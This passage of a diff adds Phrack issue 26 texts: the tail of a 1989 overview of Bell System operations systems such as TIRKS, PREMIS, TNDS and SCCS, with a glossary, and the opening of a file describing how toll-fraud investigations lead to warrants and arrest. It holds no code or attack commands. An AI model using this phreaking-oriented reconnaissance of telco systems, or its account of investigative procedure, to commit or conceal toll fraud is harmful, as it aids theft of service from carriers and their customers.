+trunks and carrier systems for the PSTN.  The process begins at various
+operations centers and ends up at the CPCs (Circuit Provision Centers) which
+track orders, design circuits, and assign the components using TIRKS.  It also
+prepares work packages and distributes them to technicians working in the field
+who implement them.
+         Current planning determines the equipment and facility requirements
+for future new circuits. It apportions forecasts for circuits among the circuit
+designs planned for new circuits.
+         TIRKS consists of five major interacting component systems:  COC
+(Circuit Order Control system), E1 (Equipment system), F1 (Facility system), C1
+(Circuit system), and FEPS (Facility and Equipment Planning System).
+
+         o COC controls message trunk orders, special-services orders, and
+           carrier system orders by tracking critical dates throughout the
+           existence of an order as it flows from the source to the CPC and on
+           to the field forces.  It provides management with the current status
+           of all circuit orders and provides data to other TIRKS component
+           systems to update the assigned status of equipment, facilities, and
+           circuits as orders are processed.
+
+         o C1 is the heart of TIRKS.  It automatically determines the types of
+           equipment required for a given circuit, assigns the equipment and
+           facilities needed, determines levels at the various transmission
+           level points on the circuit, specifies the test requirements, and
+           establishes circuit records for the circuits.  All records of
+           circuits already installed are kept in C1 for future additions or
+           changes.
+
+         o E1 is one of the two major inventory component systems in TIRKS.
+           It contains equipment inventory records, assignment records, and
+           pending equipment orders.  The records show the amount of spare
+           equipment that is available and equipment's circuit identification.
+
+         o F1 is the other of the major inventory component systems.  It
+           contains cable and carrier inventory and assigns records.
+
+         o FEPS supports the current planning process which determines the
+           transmission facilities and equipment that will be required for new
+           service. It uses data in E1, F1, and C1 as well as other forecasts
+           to allocate existing inventories efficiently, to determine future
+           facility and equipment requirements, and to update planning
+           designs.
+
+         TIRKS uses IBM-370 compatible hardware and direct-access storage
+devices.  It provides benefits to the BOCs through improved service to
+customers, capital and expense savings, and better management control.
+
+
+PICS (Plug-in Inventory Control System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         PICS is the mechanized operations system developed for the efficient
+management of large amounts of equipment inventories.  It assists with both
+inventory and materials management.  Inventory managers establish corporate
+policies for the types of equipment and for equipment utilization, assist
+engineering organizations in introducing new types of equipment while phasing
+out older types, and set utilization goals that balance service objectives and
+carrying charges on spare equipment.  Material managers work to achieve
+utilization goals by acquiring spare equipment for growth and maintenance
+purposes.  They also administer a hierarchy of locations used for storing spare
+equipment.
+         PICS/DCPR (PICS with Detailed Continuing Property Records) administers
+all types of CO equipment.  The DCPR portion of PICS/DCPR serves as a detailed
+investment database supporting accounting records for all types of CO plug-in
+and "hardwired" equipment.  PICS/DCPR accomplishes its goals of increasing
+utilization, decreasing manual effort, and providing a detailed supporting
+record for phone company investment through software, databases, administrative
+procedures, and workflows.
+         Two new functional entities are created in the BOC first:  PIA
+(Plug-In Administration) and the central stock.  PIA is the materials manager
+and is responsible for acquiring equipment, distributing it as needed to field
+locations, repairing it, and accounting for it.  The central stock is a
+warehouse where spare equipment is consolidated and managed.
+         There are five subsystems in PICS/DCPR:
+
+         o  Plug-in inventory subsystem -  maintains order, repair, and
+            inventory records for all types of plug-in equipment.
+
+         o  Inventory management subsystem - provides the PIA with mechanized
+            processes to assist in various tasks.
+
+         o  Plug-in DCPR subsystem - provides processes required to maintain
+            investment records for plug-in units.
+
+         o  Hardwired DCPR subsystem - maintains detailed accounting records
+            for hardwired CO equipment.
+
+         o  Reference file subsystem - provides and maintains reference data
+            used by all other subsystems.
+
+         PICS/DCPR runs on IBM-compatible equipment with the IBM Information
+Management System database manager.  It interfaces with TIRKS as well as a few
+other circuit-provisioning systems.
+
+
+PREMIS (PREMises Information System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         PREMIS provides fast, convenient access to information needed to
+respond to service requests.  It was developed in response to the need for
+address standardization.  It has three mechanized databases:  address data, a
+credit file, and a list of available telephone numbers.  It also serves a
+function to the LAC (Loop Assignment Center), called PREMIS/LAC.  PREMIS/LAC is
+an extension of the address database and provides for the storage of outside
+plant facility data at each address entry.
+         PREMIS supports the following service representative tasks:
+
+         o  Determining the customer's correct address.  The address related-
+            and address-keyable information is the major feature of PREMIS.
+            If an input request does not contain an accurate or complete
+            address, PREMIS displays information that can be used to query the
+            customer.  The address database allows PREMIS to give the full
+            address and information about the geographic area which includes WC
+            (Wire Center), exchange area, tax area, directory group, and the
+            service features available for that area.  It also displays
+            existing or previous customer's name and telephone number, modular
+            jacking arrangement at the address, and an indication of whether a
+            connect outside plant loop from the address back to the CO was left
+            in place.  If service was discontinued at the site, the reason for
+            disconnect and the date of disconnect are also displayed.
+
+         o  Negotiating service features.  PREMIS indicates the service
+            features that can be sold at that address, providing useful
+            information for discussing these with a customer.
+
+         o  Negotiating a service date.  If it indicates that an outside plant
+            loop back to the CO has been left in place, PREMIS allows for
+            earlier installation as no installer will need to visit the site.
+
+         o  Checking a customer's credit status.  PREMIS maintains a
+            name-keyable file of customers with outstanding debts to the
+            telephone company.  If there is a match in the database, the
+            customer's file is displayed.
+
+         o  Selecting a telephone number.  There is a file in PREMIS listing
+            all available telephone numbers from which service representatives
+            request numbers for a specific address.  The available telephone
+            numbers are read from COSMOS (COmputer System for Mainframe
+            OperationS) magnetic tape.
+
+         PREMIS/LAC has a feature called DPAC (Dedicated Plant Assignment
+Card).  Records of addresses where outside plant loop facilities are dedicated
+are organized and accessed by address by the LAC through DPAC.
+         PREMIS is an on-line interactive system whose prime users are service
+representatives interacting with customers.  It uses the UNIVAC 1100 as its
+main computer.  It has network links to various other computer systems, too,
+to obtain various pieces of information that are helpful or necessary in
+efficiently completing service functions.
+
+
+TNDS (Total Network Data System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         TNDS is actually a large and complex set of coordinated systems which
+supports a broad range of activities that depend on accurate traffic data.  It
+is more of a concept that incorporates various subsystems as opposed to a
+single computer system.  It consists of both manual procedures and computer
+systems that provide operating company managers with comprehensive, timely, and
+accurate network information that helps in analysis of the network.  TNDS
+supports operations centers responsible for administration of the trunking
+network, network data collection, daily surveillance of the load on the
+switching network, the utilization of equipment by the switching network, and
+the design of local and CO switching equipment to meet future service needs.
+         TNDS modules that collect and format traffic data usually have
+dedicated minicomputers which are at the operating company's Minicomputer
+Maintenance (Operations) Center (MMOC/MMC).  Other modules generate engineering
+and administrative reports on switching systems and on the trunking network of
+message trunks that interconnects them.  These mostly run on general-purpose
+computers.  Still others are located in AT&T centers and are accessed by
+various operating companies for data.
+         The functions of TNDS are carried out by various computer systems
+since TNDS itself is just a concept.  These subsystems include EADAS, EADAS/NM,
+TDAS, CU/EQ, LBS, 5XB COER, SPCS COER, ICAN, SONDS, TSS, CU/TK, TFS, and CSAR.
+The following sections cover these systems briefly.
+
+
+EADAS (Engineering and Administrative Data Acquisition System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         EADAS is the major data collecting system of TNDS and runs on a
+dedicated minicomputer at the NDCC (Network Data Collection Center).  Each
+EADAS serves up to fifty switching offices.  The 4ESS and No. 4 XBAR both have
+their own data acquisition systems built into the switch and they feed their
+data directly to other TNDS component systems that are downstream from EADAS,
+thereby bypassing the need for EADAS on those switches.  EADAS summarizes data
+collected for processing by downstream TNDS systems and does so in real-time.
+EADAS is used by network administrators to determine quality of service and to
+identify switching problems.  It also makes additional real-time information
+available to these administrators by providing traffic data history that covers
+up to 48 hours.  This data history is flexible through the module NORGEN
+(Network Operations Report GENerator) so that administrators can tailor their
+requests for information to determine specifics.  Information from EADAS is
+forwarded to other downstream systems in TNDS via data links or magnetic tape.
+
+
+EADAS/NM (EADAS/Network Management)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         EADAS/NM is one of the three TNDS systems that EADAS forwards traffic
+data downstream to either by data links or magnetic tape.  EADAS/NM uses data
+directly from EADAS as well as receiving data from those switching systems
+which do not interface with EADAS previously mentioned.  It monitors switching
+systems and trunk groups designated by network managers and reports existing or
+anticipated congestion on a display board at local and regional NMCs (Network
+Management Centers).  It is used to analyze problems in near real-time to
+determine their location and causes.  EADAS/NM provides information that
+requires national coordination to the AT&T Long Lines NOC (Network Operations
+Center) in Bedminster, NJ which uses it's NOCS (NOC System) to perform
+EADAS/NM-like functions on a national scale.  Like EADAS, EADAS/NM uses
+dedicated minicomputers to provide interactive real-time response and control.
+
+
+TDAS (Traffic Data Administration System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         The second of three TNDS systems that is downstream from EADAS is TDAS
+which formats the traffic data for use by most of the other downstream systems.
+It accepts data from EADAS, local vendor systems, and large toll switching
+systems on a weekly basis as magnetic tape.  It functions basically as a
+warehouse and distribution facility for the traffic data and runs a batch
+system at the computation center.  Correct association between recorded traffic
+data and the switching or trunking elements is the result of shared information
+between TDAS and CU/EQ. Data processed through TDAS is matched against that
+stored in CU/EQ.  The data is summarized weekly on magnetic tape or printout
+and is sent for use in preparation of an engineering or administrative report.
+
+
+CU/EQ (Common Update/EQuipment)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         CU/EQ is a master database which stores traffic measurements taken by
+TDAS and it shares information with TDAS, ICAN and LBS.  As said before,
+correct association between recorded traffic data and the switching or trunking
+elements is due to the shared information between CU/EQ and TDAS.  It runs as a
+batch system in the same computer as TDAS and is regularly updated with batch
+transactions to keep it current with changes in the physical arrangement of CO
+switching machines which ensures that recorded measurements are treated
+consistently in each of the reporting systems that use CU/EQ records.
+
+
+ICAN (Individual Circuit ANalysis)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         The final of the three systems downstream from EADAS is ICAN, which
+also uses data directly from EADAS but uses CU/EQ for reference information.
+It is a CO reporting system which detects electromechanical switching system
+faults by identifying abnormal load patterns on individual circuits within a
+circuit group.  ICAN produces a series of reports used by the NAC (Network
+Administration Center) to analyze the individual circuits and to verify that
+such circuits are being correctly associated with their respective groups.
+
+
+LBS (Load Balance System)
+%%%%%%%%%%%%%%%%%%%%%%%%%
+         LBS is a batch-executed system that helps assure the network
+administrator that traffic loads in each switching system are uniformly
+distributed.  It analyzes the traffic data to establish traffic loads on each
+line group of the switching system.  The NAC uses the resulting reports to
+determine the lightly loaded line groups to which new subscriber lines can be
+assigned.  LBS also calculates load balance indices for each system and
+aggregates the results for the entire BOC.
+
+
+5XB COER (No. 5 Crossbar Central Office Equipment Reports)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         The 5XB COER provides information on common-control switching
+equipment operation for different types of switching systems.  It is a
+batch-executed system that runs on a BOC mainframe that analyzes traffic data
+to determine how heavily various switching system components are used and
+measures certain service parameters.  It calculates capacity for the No. 5
+Crossbar.  Network administrators use 5XB COER reports to monitor day-to-day
+switching performance, diagnose potential switching malfunctions, and help
+predict future service needs.  Traffic engineers rely on reports to assess
+switching office capacity and to forecast equipment requirements.  It produces
+busy hour and busy season reports so service and traffic load measurements can
+be most useful in predictions.
+
+
+SPCS COER (Stored-Program Control Systems Central Office Equipment Reports)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         The SPCS COER is basically the same as the 5XB COER as it too monitors
+switching system service and  measures utilization in the same manners as
+mentioned above.  The essential differences between the 5XB COER and the SPCS
+COER are that the latter calculates capacity for 1ESS, 2ESS, and 3ESS switching
+offices as opposed to the No. 5 Crossbar switch and SPCS COER is an interactive
+system that runs on a centralized AT&T mainframe computer.
+
+
+SONDS (Small Office Network Data System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         SONDS collects its own data from small step-by-step offices
+independently of EADAS and TDAS.  It performs a full range of data manipulation
+functions and provides a number of TNDS features economically for smaller
+electromechanical step-by-step offices.  The data collected is directly from
+the offices being measured.  It processes the data and automatically
+distributes weekly, monthly, exception, and on-demand reports to managers at
+the NACs via dial-up terminals.  SONDS runs on an interactive basis at a
+centralized AT&T mainframe computer.
+
+CU/TK (Common Update/TrunKing)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         CU/TK is a database system that contains the trunking network
+information and as well as other information required by TSS (Trunking
+Servicing System) and TFS (Trunk Forecasting System).  The CU/TK is regularly
+updated by CAC (Circuit Administration Center) by personnel to keep it current
+with changes in the physical arrangements of trunks and switching machines in
+the CO.  For correct trunking and switching configuration in the processing by
+TSS and TFS, this updating process, which includes maintaining office growth
+information and a "common-language" circuit identification of all circuits for
+individual switching machines, ensures that traffic data provided by TDAS will
+be correctly associated.
+
+
+TSS (Trunk Servicing System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         TSS helps trunk administrators develop short-term plans and determine
+the number of circuits required in a trunk group.  Data from TDAS is processed
+in TSS and the offered load for each trunk group is computed.  Through offered
+load calculation on a per-trunk-group basis, TSS calculates the number of
+trunks theoretically required to handle that traffic load at a designated grade
+of service.  TSS produces weekly reports showing which trunk groups have too
+many trunks and which have too few that are performing below the
+grade-of-service objective.  Trunk orders to add or disconnect trunks are made
+by the CAC after they use the information provided through TSS.
+
+
+TFS (Trunk Forecasting System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         TFS uses traffic load data computed by TSS as well as information on
+the network configuration and forecasting parameters stored in the CU/TK
+database for long-term construction planning for new trunks.  TFS forecasts
+message trunk requirements for the next five years as the fundamental input to
+the planning process that leads to the provisioning of additional facilities.
+
+
+CSAR (Centralized System for Analysis and Reporting)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         CSAR is designed to monitor and measure how well data is being
+processed through TNDS.  It collects and analyzes data from other TNDS systems
+and provides operating company personnel at NDCCs, NACs, and CACs with
+quantitative measures of the accuracy, timeliness, and completeness of the TNDS
+data flow as well as the consistency of the TNDS record bases.  CSAR also
+presents enough information to locate and identify a data collection problem.
+CSAR summarizes the results of its TNDS monitoring for the company as input to
+the TPMP (TNDS Performance Measurement Plan) which is published monthly by
+AT&T.  CSAR runs as a centralized on-line interactive system at an AT&T
+computer center.  Its data is placed into special files, which, at the end of a
+CSAR run, are merged and transferred to the AT&T computer center.  CSAR
+performs the proper associations and analyzes each system's results.  These
+results are obtained by company managers via dial-up and they can be arranged
+in a number of formats that provide details on overall TNDS performance or
+individual system effectiveness.  Specific problems can also be identified
+through these reports.
+
+
+The following is a diagram of data flow among TNDS systems:
+
+                       *Trunk Network Reporting Systems*
+
+                    |-> TSS ----------------------> TFS
+       *       Data*|     ^                         ^
+       *Acquisition*|      %_______         _______/
+       *    Systems*|              %-CU/TK-/
+ _________          |
+|         |-->EADAS |
+|Switching|    Alt. |
+|Systems  |  Systems|        * Central Office  *
+|_________|%    |  /         *Reporting Systems*     *System Performance *
+      |  %  %->TDAS--------------------------        *Measurement Systems*
+      |   %     |  %_______      |    |     |
+      |    %  EADAS       |     LBS  5XB   SPCS .............CSAR
+      |     %   |         |    /     COER  COER                .
+      |      EADAS/NM   CU/EQ-<                                .
+      |                        %                               .
+      |                          ICAN  SONDS                   .
+      |                                  ^                     .
+      |__________________________________|            Selected data from
+                                                      other TNDS Systems
+
+
+SCCS (Switching Control Center System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         The Switching Control Center (SCC) was created to centralize the
+administration, maintenance, and control of the 1ESS switching system.  By
+using the remote-interaction interfacing of the MCC (Master Control Center),
+which is a frame of equipment in a 1ESS system that indicates the current state
+of the office equipment, the SCC functions as the centralized maintenance
+center for the switch.
+         At the SCC, a minicomputer system called the CSS (Computer Sub-System)
+is added and along with the equipment units that remote the MCC, it makes up
+the SCCS.  The CSS can support a number of SCCs.  Generally, the CSS is located
+in the MMOC.  Basically, a number of switches are handled by each SCC and the
+various SCCs are handled by the CSS.
+         The SCCS contains maintenance and administrative data that is sent
+directly from the switches. Through the SCCS, a technician can remotely operate
+the MCC keys on the switches hooked up to it as well as perform any available
+command or task supported by the switch.  The SCCS can handle up to 30 or more
+offices although usually only 15 or so are handled per SCC.  This number
+depends also on the size of the offices and the amount of data that is
+transmitted.
+         Major alarms that sound at a switching office set off alarms at the
+SCC within seconds and it also causes an update of the status of the office on
+the critical indicator panel and it displays a specific description of the
+alarm condition on a CRT alarm monitor at a workstation.  Software enhancements
+to the SCCS fall into four broad classes:
+
+         o  Enhanced Alarming - Besides alarms sounding, incoming data can
+            generate failure descriptions for easy interpretation and
+            real-time analysis techniques.
+
+         o  Interaction with Message History - Using past information on a
+            switch's troubles, the SCCS allows pertinent information on a
+            specific switch to be provided in case of an alarm.
+
+         o  Mechanization of Craft Functions - Certain conditions no longer
+            need to be looked into directly.  If an alarm goes off, the SCCS
+            can perform routine tests and fix the problem as best it can or
+            else, if that doesn't work, a trouble ticket is issued.
+
+         o  Support for Switch Administration - Through the SCCS, data can be
+            sent automatically to different operations centers as well as
+            other operations systems which require data from the switches.
+
+         Since the original SCCS came into operation, many changes have taken
+place.  The current SCCS supports all of the entire ESS family of switches as
+well as network transmission equipment and it also can maintain several
+auxiliary processor systems, like TSPS (Traffic Service Position System) and
+AIS (Automatic Intercept System), and supports network transmission equipment.
+
+
+COEES (Central Office Equipment Engineering System)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         COEES is a time-sharing system that runs on a DEC PDP-10.  It is the
+standard system for planning and engineering local switching equipment.  COEES
+contains component systems for Step-By-Step, Crossbar, 1/1AESS, and 2/2BESS
+switching systems, each of which has a different capability.
+         The COEES database stores information obtained from forecasts for each
+local switching office on number of lines of all types, number of trunks of all
+types, average call rate per line and trunk, average usage per line and trunk,
+and all features, signaling types, etc. that are required.  COEES determines
+the quantity of each type of equipment in the office needed to satisfy the
+forecasted load at objective service levels, determines an estimated price for
+engineering, procuring, and installing the equipment addition needed to reach
+the require level, and then it sums up the costs of doing it eight different
+ways for the network designer to review.  The system also takes into account
+varying parameters like call rate or proportion of lines with certain features
+which is called sensitivity analysis.
+         With the information provided by the COEES forecast, the designer can
+then make a recommendation.  After a decision is made on the recommendation,
+COEES prints out an order so that the additional equipment can more quickly and
+easily be obtained.
+         COEES also puts out a report called call store on a 1ESS, which tells
+the engineer and the equipment supplier how much memory to allocate to
+different functions in the switch depending on inputs that the engineer
+provides to the system.
+
+
+MATFAP (Metropolitan Area Transmission Facility Analysis Program)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         MATFAP is a computer program that aids in facility planning.  It
+analyzes the alternatives available to the operating company for its future
+transmission equipment and facilities using present worth of future expenses
+and other measures.
+         By combining trunk and special-service circuit forecasts with
+switching plans, network configuration, cost data, and engineering rules,
+MATFAP can identify what transmission plant will be needed at various locations
+and when it will be needed.  It also determines economic consequences of
+specific facility and/or equipment selections as well as routing choices and it
+provides the least-cost assignment of circuits to each facility as a guide to
+the circuit-provisioning process.  It is oriented towards metropolitan networks
+and facilities/equipment found in those regions.
+         MATFAP provides two benefits.  It helps automate the transmission-
+planning process and it takes into account economies that cannot be identified
+by restricted analysis.  It also balances circuit loads on high-capacity
+digital lines with additional multiplex equipment.  Data from MATFAP is edited
+through RDES (Remote Data Entry System).
+
+
+Various Operating Systems
+%%%%%%%%%%%%%%%%%%%%%%%%%
+The following is a list of other operating systems used by the Bell System with
+brief descriptions:
+
+ATRS (Automated Trouble Reporting System) - aids in the analysis of trouble
+%%%%     reports by sorting, formatting, forwarding, and examining them from
+         the entire country for standard errors
+BOSS (Billing and Order Support System) - allows access to customer records,
+%%%%     CN/A, bill adjustments, and information routing
+CAROT (Centralized Automatic Reporting On Trunks) - operations system that
+%%%%%    tests a trunk on electromechanical and electronic switching systems
+         and sends its findings to a remote computer terminal
+CATLAS (Centralized Automatic Trouble Locating and Analysis System) - an
+%%%%%%   operations system that automates trouble location procedures that
+         identify faulty circuit packs in a switch when trouble is detected
+         and diagnosed
+CMDS (Centralized Message Data System) - analyzes the AMA tapes to determine
+%%%%     traffic patterns
+COSMOS (COmputer System for Mainframe OperationS) - stores the full inventory
+%%%%%%   of telephone numbers
+CRIS (Customer Records Information System) - contains the customer billing
+%%%%     database
+CRS (Centralized Results System) - a management information system that
+%%%      automates the collection, analysis, and publication of many
+         measurement results
+CUCRIT (Capital Utilization CRITeria) - used mainly for project economic
+%%%%%%   evaluation and capital budgeting and planning
+DACS (Digital Access Cross-connect System) - remote digital access for testing
+%%%%     of special-service circuits in analog or digital form
+EFRAP (Exchange Feeder Route Analysis Program) - used in planning of the loop
+%%%%%    network
+IFRPS (Intercity Facility Relief Planning System) - also like MATFAP but deals
+%%%%%    with radio and coaxial cable as opposed to voice-frequency facilities
+IPLAN (Integrated PLanning And Analysis system) - used mainly for project
+%%%%%    economic evaluation
+LMOS (Loop Maintenance Operations System) - maintenance outages on loops
+%%%%     remotely by a service employee
+LRAP (Long Route Analysis Program) - like EFRAP, used in planning of the loop
+%%%%     network
+LSRP (Local Switching Replacement Planning system) - a system used in the
+%%%%     planning of wire centers
+NOTIS (Network Operations Trouble Information System) - aids in the analysis
+%%%%%    of trouble reports
+NSCS (Network Service Center System) - at the NSC, aids in the analysis of
+%%%%     trouble reports
+OFNPS (Outstate Facility Network Planning System) - similar to MATFAP but
+%%%%%    contains a decision aid that identifies strategies for the
+         introduction of digital facilities in a predominantly analog network;
+         rural transmission facility network planning
+RDES (Remote Data Entry System) - allows for remote editing of on-line
+%%%%     computer data
+RMAS (Remote Memory Administration System) - changes translations in the
+%%%%     switching systems
+SARTS (Switched Access Remote Test System) - accessed to perform sophisticated
+%%%%%    tests on most types of special-service circuits
+SMAS (Switched Maintenance Access System) - through the use of relays,
+%%%%     provides concentrated metallic access to individual circuits to
+         permit remote access and testing by SARTS
+TASC (Telecommunications Alarm Surveillance and Control System) - an alarm
+%%%%     program that identifies the station and transmits it back to the
+         central maintenance location
+TCAS (T-Carrier Administration System) - an operations system responsible for
+%%%%     T-carrier alarms
+TCSP (Tandem Cross Section Program) - a program for analysis of traffic
+%%%%     network planning
+TFLAP (T-carrier Fault-Locating Application Program) - a subprogram of
+%%%%%    Universal Cable Circuit Analysis Program which analyzes networks with
+         branches, multiple terminations and bridge taps
+
+
+Acronym Glossary
+%%%%%%%%%%%%%%%%
+AIS        Automatic Intercept System
+AMA        Automatic Message Accounting
+ATRS       Automated Trouble Reporting System
+BOSS       Billing and Order Support System
+C1         Circuit system
+CAC        Circuit Administration Center
+CAROT      Centralized Automatic Reporting On Trunks
+CATLAS     Centralized Automatic Trouble Locating and Analysis System
+CMDS       Centralized Message Data System
+CPC        Circuit Provision Center
+CO         Central Office
+COC        Circuit Order Control
+COEES      Central Office Equipment Engineering System
+COSMOS     COmputer System for Mainframe OperationS
+CRIS       Customer Records Information System
+CRS        Centralized Results System
+CRT        Cathode-Ray Tube
+CSAR       Centralized System for Analysis and Reporting
+CSS        Computer SubSystem
+CUCRIT     Capital Utilization CRITeria
+CU/EQ      Common Update/EQuipment system
+CU/TK      Common Update/TrunKing system
+DACS       Digital Access and Cross-connect System
+DPAC       Dedicated Plant Assignment Card
+E1         Equipment system
+EADAS      Engineering and Administrative Data Acquisition System
+EADAS/NM   EADAS/Network Management
+EFRAP      Exchange Feeder Route Analysis Program
+ESS        Electronic Switching System
+F1         Facility system
+FEPS       Facility and Equipment Planning System
+5XB COER   No. 5 Crossbar Central Office Equipment Report system
+ICAN       Individual Circuit ANalysis
+IFRPS      Intercity Facility Relief Planning System
+IPLAN      Integrated PLanning and ANalysis
+LAC        Loop Assignment Center
+LBS        Load Balance System
+LMOS       Loop Maintenance Operations System
+LRAP       Long Route Analysis Program
+LSRP       Local Switching Replacement Planning system
+MATFAP     Metropolitan Area Transmission Facility Analysis Program
+MCC        Master Control Center
+MMC        Minicomputer Maintenance Center
+MMOC       Minicomputer Maintenance Operations Center
+NAC        Network Administration Center
+NDCC       Network Data Collection Center
+NMC        Network Management Center
+NOC        Network Operations Center
+NOCS       Network Operations Center System
+NORGEN     Network Operations Report GENerator
+NOTIS      Network Operations Trouble Information System
+NSCS       Network Service Center System
+OFNPS      Outstate Facility Network Planning System
+PIA        Plug-In Administrator
+PICS       Plug-in Inventory Control System
+PICS/DCPR  PICS/Detailed Continuing Property Records
+PREMIS     PREMises Information System
+PSTN       Public Switched Telephone Network
+RDES       Remote Data Entry System
+RMAS       Remote Memory Administration Center
+SARTS      Switched Access Remote Test System
+SCC        Switching Control Center
+SCCS       Switching Control Center System
+SMAS       Switched Maintenance Access System
+SONDS      Small Office Network Data System
+SPCS COER  Stored-Program Control System/Central Office Equipment Report
+TASC       Telecommunications Alarm Surveillance and Control system
+TCAS       T-Carrier Administration System
+TCSP       Tandem Cross Section Program
+TDAS       Traffic Data Administration System
+TFLAP      T-Carrier Fault-Locating Applications Program
+TFS        Trunk Forecasting System
+TIRKS      Trunks Integrated Records Keeping System
+TNDS       Total Network Data System
+TPMP       TNDS Performance Measurement Plan
+TSPS       Traffic Service Position System
+TSS        Trunk Servicing System
+WC         Wire Center
+______________________________________________________________________________
+
+Recommended reference:
+
+         Bell System Technical Journals
+
+         Engineering and Operations in the Bell System
+
+         Phrack IX LMOS file by Phantom Phreaker
+
+         Phrack XII TNDS file by Doom Prophet
+
+         Various COSMOS files by LOD/H, KOTRT, etc.
+
+
+                              Completed 3/17/89
+______________________________________________________________________________
diff --git a/phrack26/3.txt b/phrack26/3.txt
new file mode 100644
index 0000000..7dd1013
--- /dev/null
+++ b/phrack26/3.txt
@@ -0,0 +1,180 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 3 of 11
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-                                                                             -
+=                            %> The Disk Jockey <%                            =
+-                                                                             -
+=                                  Presents                                   =
+-                                                                             -
+=                               Getting Caught                                =
+-                            - Legal Procedures -                             -
+=                                                                             =
+-                               March 24, 1989                                -
+=                                                                             =
+-           An Unbiased Look Into The Ways Of Criminal Proceedings            -
+=                                                                             =
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+
+Preface
+%%%%%%%
+     Through this file, I hope to explain what legal action is followed during
+an investigation of toll fraud.  All of the contained information is based upon
+actual factual information, and although it differs slightly from state to
+state, the majority of it is applicable anywhere.  There seems to be a lot of
+misconception as to the actual legal happenings during and after an
+investigation, so hopefully this will answer some of the too often unasked
+questions.
+
+Initiation
+%%%%%%%%%%
+     In our particular story, the whole investigation is tipped off from a
+phone call by someone to the U.S. Sprint security office.  The volume of calls
+of "hackers" calling in on other "hackers" is incredible.  It is amazing how
+when one user is mad at another and seeks some "revenge" of sorts, he calls a
+security office and advises them that they know of a person who is illegally
+using said company's long distance services.  Usually the person will talk to
+either a regular customer service representative, or someone from the security
+office.  Typically they will merely say "Hey, a guy named 'Joe' is using your
+codes that he hacks, and his home phone number is 312-xxx-xxxx."
+     Next our security person has to decide if this may indeed be a somewhat
+legitimate call.  If all seems fairly reasonable, they will start their own
+in-house investigation.  This could mean just doing a CN/A on the phone number
+in question to see who the phone is registered under, and check to see if this
+person is a legitimate subscriber to their system.
+     A call is placed to the person in question's home telco office.  Usually
+they will talk to someone in the security office, or a person whom would carry
+such a capacity in the area of security.  They will usually coordinate an
+effort to put some type of DNR (Dialed Number Recorder) on the subscriber's
+telephone line, which will record on an adding machine type of paper all data
+pertaining to:  Numbers dialed, DTMF or pulse modes, any occurrence of 2600hz,
+codes and other digits dialed, incoming calls including number of rings before
+answer, time the line was picked up and hung up, etc.
+     This DNR may sit on the subscriber's phone line from merely a few weeks,
+to several months.
+     At some point either the U.S. Sprint security representative or the telco
+security person will decide that enough time has passed, and that an analysis
+of the DNR tape is due.  The Sprint official may visit the telco site and go
+over the tapes in person, or they may be sent from the telco to the Sprint
+office.
+     After going over the tapes and finding dialups and codes that were used
+that may possibly be used illegally, Sprint will find the actual owners of
+the codes in question and verify that the codes were indeed used without any
+knowledge or permission of the legitimate owner.  They will also put together
+an estimate of "damages," which can include cost of dialup port access, cost
+of investigation, as well as the actual toll charges incurred from the
+usage.
+     The Sprint security representative and the local telco security person
+will then go to the local police, usually either state or whatever has the real
+power in that area.  They will present the case to the detective or other
+investigator, display all findings, and provided that the case findings seem
+pretty plausible, a search warrant will be composed.  After the warrant is
+fully written out (sometimes it is merely a short fill-in-the-blank form) the
+three people investigating the case (the police detective, the local telco
+security representative, and the Sprint security investigator) will go in front
+of a judge and under oath state the evidence and findings that they have as to
+date contained in a document called a "discovery" which justify the need for a
+search warrant.  Assuming that the findings seem conclusive, the judge will
+sign the warrant and it will then be active for the time specified on the
+warrant.  Usually they are valid for 24 hours a day, due to the circumstances
+that more than likely calls were being made at all hours of the day and night.
+     On some agreed date, all the above parties will show up at the suspect's
+house and execute the search warrant and more than likely collect all the phone
+and computer equipment and bring it to the state police post for further
+investigation.
+     All information and evidence as well as all the reports will then be
+forwarded to the prosecutor's office to determine what, if any, charges are
+going to be pursued.
+     Once charges are finalized through the prosecutor, another discovery
+document is made, listing all the charges and how those charges were derived.
+It is then brought in front of the judge again and if approved, warrants will
+be issued for the individual(s) listed.
+     The warrants are usually served by sending over one of the local officers
+to the suspect's house, and he will knock, introduce himself and ask for the
+individual, and then present the warrant to the individual and take them in to
+the station.
+     The individual will be processed, which usually means being photographed
+and fingerprinted twice (once for the FBI and once for the state records), and
+then is put into either a holding cell or regular jail.
+     Sometimes the bond is already set before the individual is arrested, but
+sometimes it is not.  If not, it will be at the arraignment.
+     Within 72 hours, the suspect must be arraigned.  The arraignment is a time
